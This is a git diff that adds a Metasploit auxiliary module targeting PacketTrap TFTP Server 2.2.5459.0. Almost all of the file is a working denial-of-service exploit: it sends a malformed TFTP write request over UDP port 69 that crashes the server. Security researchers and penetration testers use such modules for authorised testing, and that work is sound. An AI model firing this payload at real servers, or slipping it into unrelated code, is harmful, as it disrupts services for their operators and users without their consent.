diff --git a/modules/auxiliary/dos/tftp/pt360_write.rb b/modules/auxiliary/dos/tftp/pt360_write.rb new file mode 100644 index 0000000000..3ce0e97db1 --- /dev/null +++ b/modules/auxiliary/dos/tftp/pt360_write.rb @@ -0,0 +1,31 @@ +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::Udp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PacketTrap TFTP Server 2.2.5459.0 DoS', + 'Description' => %q{ + The PacketTrap TFTP server version 2.2.5459.0 can be + brought down by sending a special write request. + }, + 'Author' => 'Kris Katterjohn ', + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ [ 'URL', 'http://milw0rm.com/exploits/6863'] ], + 'DisclosureDate' => 'Oct 29 2008')) + + register_options([Opt::RPORT(69)]) + end + + def run + connect_udp + print_status("Sending write request...") + udp_sock.put("\x00\x02|\x00netascii\x00") + disconnect_udp + end +end +